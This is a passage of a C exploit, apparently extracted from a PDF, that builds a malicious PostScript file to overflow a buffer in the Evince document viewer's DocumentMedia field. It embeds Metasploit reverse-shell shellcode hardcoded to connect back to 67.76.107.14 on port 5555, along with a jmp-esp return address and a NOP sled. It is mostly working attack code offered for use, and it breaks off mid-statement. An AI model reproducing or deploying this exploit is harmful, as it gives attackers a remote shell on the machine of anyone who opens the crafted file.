1 /*
2 * Creator: K−sPecial (xzziroz.net) of .aware (awarenetwork.org)
3 * Name: evince−ps−field−bof.c
4 * Date: 11/27/2006
5 * Version:
6 *
1.00 − creation
7 *
8 * Other: this idea originaly came from the bid for the ’gv’ buffer overflow (20978), i don’t
9 * believe it’s known until now that evince is also vulnerable.
10 *
11 * Compile: gcc −o epfb evince−ps−field−bof.c −std=c99
12 */
13 #include <stdio.h>
14 #include <errno.h>
15 #include <stdlib.h>
16 #include <string.h>
17 #include <arpa/inet.h>
18
19 // insert shellcode here, i’m not going to implement ip/port changing since
20 // metasploit’s shellcode generation engine does it just fine. i had a picky time
21 // with the shellcodes, there must be some bad bytes. this shellcode from
22 // metasploit works but be SURE to set Encoder=None
23
24 /* linux_ia32_reverse − LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
25 char cb[] =
26 "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
27 "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
28 "\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
29 "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
30 "\x89\xe1\xb0\x0b\xcd\x80";
31
32 // location of "jmp *%esp"
33 char jmpesp[] = "\x77\xe7\xff\xff";
34
35 int main (int argc, char **argv) {
36
FILE *fh;
37
38
if (!(fh = fopen(*(argv+1), "w+b"))) {
39
printf("%s <file.ps>\n\n", *(argv));
40
printf("[−] unable to open file ’%s’ for writing: %s\n", *(argv+1), strerror(errno));
41
exit(1);
42
}
43
44
fputs("%!PS−Adobe−3.0\n", fh);
45
fputs("%%Title: hello.ps\n", fh);
46
fputs("%%For: K−sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
47
fputs("%%BoundingBox: 24 24 588 768\n", fh);
48
fputs("%%DocumentMedia: ", fh);
49
for (int i = 0; i < 100; i++)
50
fputc(0x90, fh);
51
52
fwrite(cb, strlen(cb), 1, fh);
Page 1/2
Evince Document Viewer DocumentMedia Buffer Overflow Exploit
K−sPecial
11/28/2006
53
54
for (int i = strlen(cb) + 100; i < 273; i++)
55
fputc